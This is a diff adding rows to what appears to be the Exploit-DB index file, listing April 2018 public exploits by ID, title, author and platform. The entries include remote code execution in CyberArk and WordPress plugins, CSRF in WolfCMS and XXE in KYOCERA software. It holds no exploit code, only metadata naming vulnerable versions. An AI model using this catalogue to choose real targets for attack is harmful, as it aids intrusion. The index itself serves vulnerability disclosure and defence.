@@ -39113,3 +39119,16 @@ id,file,description,date,author,type,platform,port 44413,exploits/hardware/webapps/44413.txt,"FiberHome VDSL2 Modem HG 150-UB - Authentication Bypass",2018-04-06,"Noman Riffat",webapps,hardware, 44414,exploits/windows/webapps/44414.txt,"DotNetNuke DNNarticle Module 11 - Directory Traversal",2018-04-06,"Esmaeil Rahimian",webapps,windows, 44416,exploits/php/webapps/44416.txt,"Cobub Razor 0.7.2 - Cross Site Request Forgery",2018-04-06,ppb,webapps,php, +44418,exploits/php/webapps/44418.txt,"WolfCMS 0.8.3.1 - Cross Site Request Forgery",2018-04-09,"Sureshbabu Narvaneni",webapps,php, +44419,exploits/php/webapps/44419.txt,"Cobub Razor 0.7.2 - Add New Superuser Account",2018-04-09,ppb,webapps,php, +44420,exploits/php/webapps/44420.txt,"MyBB Plugin Recent Threads On Index - Cross-Site Scripting",2018-04-09,Perileos,webapps,php, +44421,exploits/php/webapps/44421.txt,"WolfCMS 0.8.3.1 - Open Redirection",2018-04-09,"Sureshbabu Narvaneni",webapps,php,80 +44424,exploits/php/webapps/44424.txt,"Yahei PHP Prober 0.4.7 - Cross-Site Scripting",2018-04-09,ManhNho,webapps,php, +44425,exploits/php/webapps/44425.txt,"WordPress Plugin Simple Fields 0.2 - 0.3.5 - Local/Remote File Inclusion / Remote Code Execution",2018-04-09,"Graeme Robinson",webapps,php,80 +44429,exploits/json/webapps/44429.txt,"CyberArk Password Vault Web Access < 9.9.5 / < 9.10 / 10.1 - Remote Code Execution",2018-04-09,"RedTeam Pentesting",webapps,json, +44430,exploits/linux/webapps/44430.txt,"KYOCERA Multi-Set Template Editor 3.4 - Out-Of-Band XML External Entity Injection",2018-04-09,LiquidWorm,webapps,linux, +44431,exploits/linux/webapps/44431.txt,"KYOCERA Net Admin 3.4 - Cross Site Request Forgery - Add Admin Exploit",2018-04-09,LiquidWorm,webapps,linux, +44432,exploits/php/webapps/44432.txt,"Buddypress Xprofile Custom Fields Type 2.6.3 - Remote Code Execution",2018-04-09,"Lenon Leite",webapps,php, +44433,exploits/php/webapps/44433.txt,"WooCommerce CSV-Importer-Plugin 3.3.6 - Remote Code 
Execution",2018-04-09,"Lenon Leite",webapps,php, +44434,exploits/php/webapps/44434.txt,"iScripts SonicBB 1.0 - Reflected Cross-Site Scripting",2018-04-09,ManhNho,webapps,php, +44435,exploits/php/webapps/44435.txt,"WordPress Plugin Google Drive 2.2 - Remote Code Execution",2018-04-09,"Lenon Leite",webapps,php,